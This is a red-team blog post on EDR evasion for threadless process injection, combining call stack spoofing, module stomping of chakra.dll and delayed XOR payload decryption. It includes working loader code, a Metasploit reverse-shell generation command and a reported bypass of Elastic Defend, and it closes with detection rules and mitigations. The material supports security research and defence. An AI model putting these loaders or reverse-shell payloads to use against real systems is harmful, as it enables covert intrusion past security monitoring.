Threadless Ops - Enhanced Shellcoding for Threadless Injections

Process injection is essential in red teaming and serves various strategic objectives, enabling attackers to expand their capabilities.

In Threadless Ops II, we combine threadless injection with evasion techniques to bypass EDR heuristics. Using Crystal Palace lets us modularly integrate tradecraft (call stack spoofing, module stomping, Caro-Kann) into our loader. A practical test against Elastic Defend shows the results.

The threadless injection technique that we discussed in our first blog post has since seen wider adoption. For example, the C2-Framework Nighthawk, which we use, implemented this technique in version 0.3.4 as ExperimentalHijack. We have also successfully used this technique during attack simulations and red team engagements to evade EDR detections.

In the second part of our Threadless Ops blog post series, we combine threadless injection with several evasion techniques to bypass typical EDR heuristics. As a foundation, we use the PIC framework Crystal Palace, which acts as a linker and lets us modularly integrate tradecraft such as call stack spoofing and additional resources into our loader. In addition, we apply module stomping to place our code in trustworthy, image-backed memory, and the Caro-Kann principle to delay the decryption and execution of the payload, so that simple memory scans come up empty. Finally, we run a practical test against Elastic Defend, followed by a classification of the most important IOCs and mitigations.

The source files discussed in this blog post can be found on our GitHub repository ThreadlessOps.



The approach described in this section assumes that a target process has already been hijacked and that a threadless injection integration, as described in the first blog post, is available. We start in the “Loader Stub”, which is called by the “Threadless Injection Stub”. The latter has already corrected the stack alignment, saved the volatile registers, and reserved stack space, handling the complex transition out of the hijacked control flow to the point where only a clean return from the “Loader Stub” is required at the end. The target process can then continue without noticeable interruption. The “Loader Stub” is the shellcode that can be supplied, e.g. when using the Threadless Injection BOF.

EDRs often detect malicious code via suspicious Windows API calls. Among other things, they check which type of memory the calling code originates from, e.g. whether it is executed from backed memory. Backed memory refers to memory regions mapped from files, such as the program image itself or loaded modules (e.g. user32.dll); such memory has a corresponding file on disk (“backed by file”). For particularly sensitive Windows API calls, some EDRs additionally analyze the call stack, for example based on kernel callback or ETW telemetry. Return addresses on the call stack that point to unbacked memory are an indicator of shellcode. This type of detection is particularly hard to bypass. There are, however, legitimate exceptions, such as Just-In-Time (JIT) compiled code, which also runs from unbacked memory.
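To make the backed/unbacked distinction concrete, here is a minimal defender-side sketch in portable C. It assumes a list of image address ranges (the `module_range` type and the sample addresses used with it are hypothetical, not any EDR's data model) and counts the return addresses of a captured call stack that fall outside every image. Real products obtain both the ranges and the stack from kernel callbacks or ETW telemetry and have to account for legitimate JIT regions; this only models the classification step.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical description of an image-backed (file-mapped) address range. */
typedef struct {
    const char *name;
    uintptr_t   base;
    size_t      size;
} module_range;

/* Returns the module containing addr, or NULL if addr is unbacked. */
const module_range *find_module(const module_range *mods, size_t n,
                                uintptr_t addr)
{
    for (size_t i = 0; i < n; i++) {
        /* Subtracting first avoids overflow in base + size. */
        if (addr >= mods[i].base && addr - mods[i].base < mods[i].size)
            return &mods[i];
    }
    return NULL;
}

/* Counts return addresses on a captured call stack that lie outside
 * every known image, i.e. in private (unbacked) memory. */
size_t count_unbacked_frames(const module_range *mods, size_t n,
                             const uintptr_t *frames, size_t depth)
{
    assert(frames != NULL || depth == 0);
    size_t unbacked = 0;
    for (size_t i = 0; i < depth; i++) {
        if (find_module(mods, n, frames[i]) == NULL)
            unbacked++;
    }
    return unbacked;
}
```

For example, a three-frame stack in which one return address lies outside both an ntdll.dll and a kernel32.dll range yields a count of 1, which a product would then weigh against how sensitive the called API is.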

Without call stack spoofing, points 1 and 2 from the figure above typically lead to EDR detections in practice. Call stack spoofing is therefore used to make the corresponding API calls appear to originate from a different code location. At point 1, an additional module is loaded into the process, which provides backed memory. Then, at point 2, a dispensable region inside it is overwritten, and the code is executed from backed memory in a new thread.

The new thread is needed to continue executing both the original control flow and a payload. Strictly speaking, this contradicts the “threadless” in the name Ceri Coburn gave the technique, but in practice it is a pragmatic compromise to keep execution stable. Unlike in traditional remote process injection, the new thread is started from within the target process itself. This removes the classic detection pattern in which a foreign process allocates memory in the target, writes to it, and then triggers execution (Memory Allocation → Memory Writing → Execution).

What remains is the new thread running the Caro-Kann stub, which decrypts and executes the payload after a five-second delay (point 3). Since many EDRs scan the memory of newly created threads for static signatures, delaying the decryption helps bypass this detection. Otherwise, a classic Metasploit payload, for example, would stand out immediately.

In more complex projects, developing PIC introduces several challenges. Compiling a program creates multiple sections with different purposes, which cannot simply be used as PIC shellcode. In addition to the generated machine code in the “.text” section, sections for data such as global variables, strings, or jump tables are used (e.g. “.rdata”, “.data”). When executing shellcode, we cannot rely on the Windows loader, which would normally handle relocations, imports, and initialization automatically. PIC is also hard to build modularly because code and data become tightly interwoven during linking. Once multiple “features” (e.g. evasion + capability) need to be maintained in separate files or modules, typical issues arise, such as relocations and absolute references, imports via the IAT, and debuggability. In short, without a framework, PIC development often ends up as a fragile mix of compiler tricks, complex source code, and very time-consuming debugging.

The “new plan” for injection sounds simple in theory, but in practice it is significantly more complex. For this reason, it makes sense to use a supporting PIC framework. A well-known framework is Stardust, which can be used as a foundation for C2 agents or implants. It solves some fundamental development problems and provides a solid basis for such projects. A related article is “Modern implant design: position independent malware development” on 5pider.net.

Through the Red Team Lead certification from Zero-Point Security, we came across the Crystal Palace framework. This framework was recently published by Raphael Mudge under “A PIC Security Research Adventure” on Tradecraft Garden. Rasta Mouse from Zero-Point Security used it to create the Crystal Kit, implementing advanced evasion capabilities for the well-known Cobalt Strike C2-Framework. This project shows how well Crystal Palace can be used and structured as a PIC framework.

Historically, PIC was built using modified linker scripts with standard compilers and then extracted from executables. Crystal Palace takes a different approach. It acts as a linker itself and performs this step autonomously at the end. This solves several fundamental problems in PIC development. By implementing custom linker scripts, projects can be structured modularly, and tradecraft can be cleanly separated from capability. Raphael Mudge provides a good explanation on his website in the “Videos” section.

Our approach requires Windows API calls. As mentioned, EDRs monitor these in multiple ways. A classic detection method is hooking Windows functions, which could previously be bypassed by unhooking or by using direct or indirect syscalls. More recently, Microsoft’s Threat Intelligence provider for Event Tracing for Windows (ETW TI) has been introduced. It provides telemetry for security-relevant operations, mostly emitted from the kernel. This allows EDRs to verify sensitive actions with detailed information, e.g. the call stack, without relying on user-mode hooks that an attacker could remove. If, for example, CreateThread is called from private (unbacked) memory, or if private memory is used as the thread start address, this is most likely an indicator of shellcode injection.



This is what our call stack for CreateThread looks like without evasion:

After resolving the memory address:

Our call stack thus points to private working memory that was assigned via VirtualAlloc. To bypass this, the call must originate from backed memory or at least look that way. A very clever technique is shown by NtDallas in the Draugr project. It uses gadgets from existing modules such as kernelbase.dll from Microsoft.



The tool searches the machine code for a location where a jump instruction to a controllable register such as RBX directly follows a call. Because the jump is not interpreted as part of the call stack, this location can be used to break out of the usual return path. Draugr builds a synthetic, spoofed call stack in which that address is the first return address, and additionally sets the RBX register to the attacker-controlled address in memory. A stack walker therefore does not see that, immediately after the first return, execution jumps to the address in RBX and the remaining return addresses on the stack are never traversed.



Our call stack for CreateThread with evasion:

This is a call stack that was synthetically created by Draugr. It looks legitimate because the thread start appears to come from a typical thread start address (“ntdll.RtlUserThreadStart”) and no return addresses point to private working memory. The gadget can be seen when inspecting the code behind the first return address. It performs a jump to the value in RBX, which again points to our shellcode in the private memory region.

Draugr has already been adapted for Crystal Palace by Rasta Mouse in Crystal Kit. Crystal Palace allows overriding functions at link time via a custom linker script. To disable or enable call stack spoofing for CreateThread, the following line in “loader.spec” can be commented or uncommented:

attach "KERNEL32$CreateThread" "_CreateThread"

When this line is uncommented, all calls to CreateThread use the function “_CreateThread” in “hook.c”. This function serves as a wrapper for CreateThread using the Draugr technique. The technique itself is implemented via “spoof.c” and “draugr.asm”.



If our new thread is started and our payload calls a Windows API such as MessageBoxW, the same call stack problem occurs again:

We could apply call stack spoofing here as well, but we may want to use a different payload that does not offer that option. Module stomping is an in-memory technique where code is written into the memory region of an already loaded, legitimate module, i.e. into backed memory. The goal is to relocate execution to an address that looks plausible from the perspective of many artifacts, such as memory mappings and module attribution, since it lies inside a well-known image.

First, a new module is loaded that will later be overwritten. In this example, chakra.dll from Microsoft is used. Once the module is loaded, a chosen function, such as “MemProtectHeapUnprotectCurrentThread”, is overwritten with our code. To overwrite code in backed memory, the memory protection must first be changed to “PAGE_READWRITE” and then restored after writing. Finally, as planned, a new thread is started at the overwritten function. Here is an example from the source code:

// Resolve target module (already loaded or loaded on demand)
stomp.Dll = KERNEL32$GetModuleHandleA ( "chakra.dll" );
if ( stomp.Dll == NULL ) {
    stomp.Dll = LoadLibraryA ( "chakra.dll" );
}

// Resolve target function to overwrite
stomp.Func = ( PVOID ) GetProcAddress ( ( HMODULE ) stomp.Dll, "MemProtectHeapUnprotectCurrentThread" );

if ( stomp.Func != NULL ) {
    // Make the target function region writable (page-granular change)
    DWORD orig_protect;
    KERNEL32$VirtualProtect ( stomp.Func, stomp.InjectionLength, PAGE_READWRITE, &orig_protect );

    // Overwrite the function body with the payload bytes
    __movsb ( ( unsigned char * ) stomp.Func, ( unsigned char * ) stomp.InjectionAddr, stomp.InjectionLength );

    // Restore the original memory protection
    DWORD old_protect;
    KERNEL32$VirtualProtect ( stomp.Func, stomp.InjectionLength, orig_protect, &old_protect );

    // Execute the overwritten function in a new thread
    DWORD tid = 0;
    HANDLE h = KERNEL32$CreateThread ( NULL, 0, stomp.Func, NULL, 0, &tid );

    // Close thread handle to avoid leaking kernel objects
    if ( h ) {
        KERNEL32$CloseHandle ( h );
    }
}
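The comments in the listing note that the protection change is page-granular. VirtualProtect affects every page that contains at least one byte of [addr, addr + len), so a short function near a page boundary flips two pages, and any other code sharing those pages is non-executable while they are PAGE_READWRITE. A small portable sketch of that rounding (the `page_span` type and `pages_touched` helper are illustrative, not part of the project); real code would take the page size from `GetSystemInfo` (`dwPageSize`) rather than assume 4 KiB:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Page-aligned range affected by a protection change on [addr, addr + len). */
typedef struct {
    uintptr_t first_page;  /* address of the first affected page */
    size_t    page_count;  /* number of affected pages */
} page_span;

page_span pages_touched(uintptr_t addr, size_t len, size_t page_size)
{
    /* Page sizes are powers of two, which the masking below relies on. */
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    assert(len > 0);
    uintptr_t mask  = ~(uintptr_t)(page_size - 1);
    uintptr_t start = addr & mask;
    uintptr_t last  = (addr + len - 1) & mask;  /* page holding the last byte */
    page_span span  = { start, (size_t)((last - start) / page_size) + 1 };
    return span;
}
```

With a 4 KiB page size, a 0x20-byte region at 0x1FF0 spans two pages starting at 0x1000, while the same length at 0x1234 stays within a single page.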

In addition to resolving Windows API functions, Crystal Palace also simplifies handling strings, which classic PIC cannot easily use because string literals are placed in a separate data section such as “.rdata”. Because it functions as a linker, Crystal Palace can add the required sections to the shellcode and reference them within the shellcode. Another very practical feature is the dynamic embedding of resources via additional sections. In the following example, the code for the Caro-Kann stub is shipped as a resource inside the loader and integrated into the generated shellcode during linking.

// Linker-defined section containing the Caro-Kann shellcode to be injected,
// including the encrypted payload defined by the .spec files
char _carokann_ [ 0 ] __attribute__ ( ( section ( "carokann" ) ) );

/*
 * Loads a module, overwrites an exported function with a custom
 * payload, and executes it in a new thread.
 */
void moduleStomp() {
    STOMP_DLL stomp = { 0 };

    // Resolve embedded Caro-Kann shellcode
    _RESOURCE * carokann = ( _RESOURCE * ) &_carokann_;
    stomp.InjectionAddr = carokann->value;
    stomp.InjectionLength = carokann->length;

    // ... module stomping steps as in the previous listing ...
}

The section content is then declared in “loader.spec”, where it is generated dynamically and appended at build time:

# Add carokann shellcode to section 'carokann'
run carokann.spec
preplen
link "carokann"
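On the C side, the listing above overlays `_RESOURCE` directly on the linked section and reads `length` and `value`. The sketch below makes that layout explicit with a bounds check, under the assumption (to be verified against the Crystal Palace documentation) that `preplen` prepends a 32-bit little-endian length to the data; `resource_view` and `parse_preplen` are hypothetical names used only for illustration:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical view of a length-prefixed blob, mirroring _RESOURCE. */
typedef struct {
    uint32_t             length;
    const unsigned char *value;
} resource_view;

/* Parses a blob assumed to start with a 32-bit little-endian length.
 * Returns 0 on success, -1 if the blob is shorter than it claims. */
int parse_preplen(const unsigned char *blob, size_t blob_size,
                  resource_view *out)
{
    assert(blob != NULL && out != NULL);
    if (blob_size < 4)
        return -1;
    uint32_t len = (uint32_t)blob[0]
                 | ((uint32_t)blob[1] << 8)
                 | ((uint32_t)blob[2] << 16)
                 | ((uint32_t)blob[3] << 24);
    if (len > blob_size - 4)
        return -1;
    out->length = len;
    out->value  = blob + 4;  /* data starts right after the prefix */
    return 0;
}
```

The explicit parse trades the zero-copy overlay for a check that the section actually holds as many bytes as its prefix claims.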

From the perspective of sections in the shellcode, the overview from before would look like this:

Once the new thread has been started after module stomping, an EDR memory scan is likely to be performed. The principle from the Caro-Kann project by Fabian Mosch is to decrypt and execute the critical part of our code, i.e. the payload, only after a delay of several seconds, thereby evading the EDR memory scan. Here, Crystal Palace can once again help us by linking custom sections. In addition, the framework offers dynamic key generation and automatic encryption at build time. In the “carokann.spec” linker script, the payload is linked as follows:

# Generate a 128-bit XOR key for the payload
generate $MASK 128

# Encrypt and add payload to section 'payload'
run "payload.spec"
xor $MASK
preplen
link "payload"

# load "shellcode.bin"
# xor $MASK
# preplen
# link "payload"

# Add XOR key to section 'mask'
push $MASK
preplen
link "mask"

In this case, XOR encryption is used with a randomly generated 128-bit key. This key is stored in the “mask” section, so that the shellcode can use it. Crystal Palace automates payload encryption via the “xor $MASK” command placed before “link”.
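Because XOR is its own inverse, the same operation serves both the build-time encryption and the run-time decryption in the Caro-Kann stub. A minimal sketch of repeating-key XOR (the `xor_repeating` name is illustrative, not taken from the project). Note that this is obfuscation rather than cryptography: it only hides static signatures until the stub decrypts the buffer, which is exactly why the timing of that decryption matters:

```c
#include <assert.h>
#include <stddef.h>

/* XORs buf in place with key, repeating the key as often as needed.
 * Calling it twice with the same key restores the original bytes. */
void xor_repeating(unsigned char *buf, size_t len,
                   const unsigned char *key, size_t key_len)
{
    assert(key != NULL && key_len > 0);
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % key_len];
}
```

The key index wraps with `i % key_len`, matching the `i % mask->length` expression in the Caro-Kann stub.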

Note: This payload can also be replaced with existing shellcode from the file system by commenting out the lines around “run payload.spec” and uncommenting the lines around “load shellcode.bin”.



The code in “payload.c” is executed as the payload, specified for the linker via “payload.spec”. Below is a very simple example payload that shows a message box:

// Optional delay to prevent potential re-entrancy issues when a WDAC UI dialog is active
KERNEL32$Sleep( 200 );

// Show MessageBox
USER32$MessageBoxW(
    NULL,
    L"Hello from Payload",
    L"Demo",
    MB_OK | MB_ICONINFORMATION
);

The code for the Caro-Kann stub is then:

// Caro-Kann: sleep 5 s before starting decryption/execution
KERNEL32$Sleep ( 5000 );

_RESOURCE * payload = ( _RESOURCE * ) &_payload_;
_RESOURCE * mask = ( _RESOURCE * ) &_mask_;

// Make the payload buffer writable for in-place decryption (note: VirtualProtect operates at page granularity)
DWORD orig_protect;
KERNEL32$VirtualProtect ( payload->value, payload->length, PAGE_READWRITE, &orig_protect );

// Decrypt payload in-place (XOR with repeating mask)
for ( int i = 0; i < payload->length; i++ ) {
    payload->value [ i ] = payload->value [ i ] ^ mask->value [ i % mask->length ];
}

// Restore the original protection
DWORD old_protect;
KERNEL32$VirtualProtect ( payload->value, payload->length, orig_protect, &old_protect );

// Execute decrypted payload
( ( void ( * ) ( ) ) payload->value ) ( );

The new thread waits five seconds, then adjusts memory permissions, decrypts the payload, and executes it. Control flow is handed over to the payload via a function call on the pointer “payload->value”.

The source code can be compiled with “make” and then linked into PIC using Crystal Palace as follows:

./piclink /home/kali/src/source/loader.spec x64 /home/kali/test.bin



This shellcode can then, for example, be injected into another process using the threadless-inject-BOF in Sliver:

The result appears five seconds after Notepad.exe calls NtWaitForSingleObject:

Elastic Defend can easily be run in a local development environment and can be evaluated with a one-month trial license. For a meaningful test, it is recommended to use a payload with a high detection rate. Here, a reverse shell was generated via Metasploit and stored as the payload in “carokann.spec”:

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=4444 > shellcode.bin





When this payload is executed without additional evasion techniques, Elastic Defend generates two alerts and detects that shellcode is executed from unbacked memory:

Immediately afterwards, the resulting static memory scan reliably detects the payload via signatures:





If call stack spoofing is enabled in the loader stub and module stomping along with the Caro-Kann principle are applied, the same Metasploit payload is no longer detected in an analogous test. The reverse shell connection could be established and used successfully:

Elastic Defend did not trigger any alerts, including ones related to process creation (starting the calculator). Still, it is likely that the reverse shell will become noticeable later as soon as further suspicious actions are performed that trigger another memory scan. Modern C2-Frameworks such as Cobalt Strike or Nighthawk address this with another technique called sleep masking, where relevant memory regions are repeatedly encrypted and decrypted between activity phases.

In this project, multiple techniques were combined, each producing different IOCs and therefore requiring different mitigation approaches. A post from Elastic about in-memory threats describes how, among other things, process injection via “Threadless Inject” can be detected through suspicious cross-process memory writes. Because a foreign process manipulates memory regions inside loaded modules, the following rule, which correlates WriteProcessMemory with target references to critical modules, could detect this activity for “ntdll.dll” and “kernelbase.dll”:

api where process.Ext.api.name : "WriteProcessMemory" and process.Ext.api.behaviors == "cross-process" and process.Ext.api.summary : ("*ntdll.dll*", "*kernelbase.dll*")

If this detection does not apply, the next IOC would be call stack spoofing. A lot of malware, as well as modern C2-Frameworks, use this technique to avoid EDR detection. Since ETW TI events are usually processed asynchronously, the register contents at the time of the call are no longer available, so validating them is not realistic. Still, EDRs could detect “return-to-gadget” patterns by looking for “jmp rbx” or rare offsets inside known modules. A synthetic stack could also be validated during stack walking by checking for valid unwind metadata. Our current experience shows, however, that such detections are generally missing, even though this is an approach that EDR vendors should pursue.
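A minimal sketch of the return-to-gadget heuristic described above, in portable C over a copy of a module's code bytes. It flags a return address if the bytes before it end in a common call encoding (E8 rel32, or FF 15 disp32 for `call [rip+disp32]`) and the instruction at the address itself is `jmp rbx` (FF E3). The function name and the restriction to these two call encodings and to RBX are simplifying assumptions; decoding x86 backwards is ambiguous, so a real detection would combine this with unwind metadata and frequency data rather than rely on it alone:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Heuristic check of a return address at offset ret_off in code[]:
 * true if it is preceded by a plausible call and points at jmp rbx. */
bool looks_like_jmp_rbx_gadget(const unsigned char *code, size_t code_len,
                               size_t ret_off)
{
    assert(code != NULL);
    /* Need two bytes at the return address for FF E3. */
    if (ret_off >= code_len || code_len - ret_off < 2)
        return false;
    /* E8 rel32 is 5 bytes long; FF 15 disp32 is 6 bytes long. */
    bool call_before =
        (ret_off >= 5 && code[ret_off - 5] == 0xE8) ||
        (ret_off >= 6 && code[ret_off - 6] == 0xFF && code[ret_off - 5] == 0x15);
    bool jmp_rbx = code[ret_off] == 0xFF && code[ret_off + 1] == 0xE3;
    return call_before && jmp_rbx;
}
```

Because a stray 0xE8 byte inside a longer instruction also satisfies the call check, hits from this function are candidates for closer inspection, not verdicts.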

A robust mitigation against call stack spoofing that defenders could use is hardware-enforced stack protection (HSP) via CET/Shadow Stack. The CPU maintains a shadow stack in parallel that holds only return addresses, so a manipulated return chain is detected as soon as a return address on the normal stack no longer matches its shadow copy. Since this memory cannot be written by ordinary user-mode stores, it can be an effective mitigation in user-land applications, preventing Draugr-like techniques and many similar ones. However, this requires applications and relevant modules to be built in a CET-compatible manner, the CPU to support CET/Shadow Stack, and the environment to actually enforce it. With this mitigation in place, violations would lead to immediate termination of the program.
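A toy model of the shadow stack check, as a sketch only: on real hardware the shadow stack lives in CPU-protected pages and a mismatch raises a control-protection exception (#CP), whereas here both stacks are plain arrays. The `cpu_model`, `model_call`, and `model_ret` names are hypothetical. The model shows why a spoofed return chain fails: overwriting a return address on the normal stack does not change its copy on the shadow stack.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define SHADOW_DEPTH 64

/* The "normal" stack is writable by the program; the shadow stack stands
 * in for CPU-protected memory that only call and ret update. */
typedef struct {
    uintptr_t normal[SHADOW_DEPTH];
    uintptr_t shadow[SHADOW_DEPTH];
    size_t    top;
} cpu_model;

/* call: push the return address onto both stacks. */
void model_call(cpu_model *c, uintptr_t ret_addr)
{
    assert(c->top < SHADOW_DEPTH);
    c->normal[c->top] = ret_addr;
    c->shadow[c->top] = ret_addr;
    c->top++;
}

/* ret: pop both stacks; returns false where real hardware would raise
 * #CP because the two return addresses differ. */
bool model_ret(cpu_model *c)
{
    assert(c->top > 0);
    c->top--;
    return c->normal[c->top] == c->shadow[c->top];
}
```

For example, after two calls, overwriting `normal[1]` makes the next `model_ret` return false, while the untouched outer frame still returns normally.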

Module stomping is comparatively easier to detect. Loading a module (e.g. chakra.dll), changing memory protection (e.g. RW/RX transitions), and overwriting larger regions within backed memory yields a clear, suspicious pattern. In addition, the two very typical working-set indicators Shared and ShareCount can be used as IOCs to quickly detect “modified backed memory”: once a page of a mapped image has been written, it becomes a private copy and is no longer shared. Also, loading modules that are unusual for the process, such as “chakra.dll”, can serve as an additional indicator.
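Complementary to the working-set attributes, modified backed memory can also be found by comparing a loaded image's code with the same bytes from the file on disk. A portable sketch of the page-level comparison (the `modified_pages` name is illustrative); it assumes both buffers are already aligned copies of the same section and that base relocations have been applied to the disk copy, since relocated code legitimately differs from the file:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Compares the in-memory bytes of an image section with the same section
 * taken from the file on disk, page by page. Writes the indices of
 * differing pages to out (at most out_cap) and returns how many were
 * written. */
size_t modified_pages(const unsigned char *mem, const unsigned char *disk,
                      size_t len, size_t page_size,
                      size_t *out, size_t out_cap)
{
    assert(mem != NULL && disk != NULL && page_size > 0);
    size_t found = 0;
    for (size_t off = 0; off < len && found < out_cap; off += page_size) {
        /* The last page may be partial. */
        size_t chunk = (len - off < page_size) ? len - off : page_size;
        if (memcmp(mem + off, disk + off, chunk) != 0)
            out[found++] = off / page_size;
    }
    return found;
}
```

With 4 KiB pages, a single patched byte at offset 5000 is reported as page 1, which is the granularity at which the Shared attribute would also flip.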

Tools like Moneta can make typical IOCs of in-memory techniques visible, such as modified backed memory or suspicious RW→RX transitions, and would very likely have flagged the loader in this project as suspicious.

The fact that no alert was triggered in the practical test highlights that extending an EDR with custom detections is an important task in IT security. Call stack spoofing in particular remains hard to mitigate in many environments. CET/Shadow Stack is a strong countermeasure, but in practice it is often only partially feasible because applications and dependencies are not yet consistently built in a CET-compatible manner. This makes a defense-in-depth approach crucial: controls should complement each other rather than rely on a single detection logic.

The practical implication is that if individual in-memory heuristics are bypassed, behavioral signals can still be used to detect suspicious activity. Especially valuable are correlations that are hard to hide, e.g. LDAP communication from unusual processes. Ultimately, it is this combination of telemetry, correlation, and hardening that determines whether defense evasion remains a lab scenario or slips through in real operations.

If you have questions or comments, you are welcome to send them to research@avantguard.io. If you would like to test or improve your detection mechanisms, please feel free to contact us via our website.
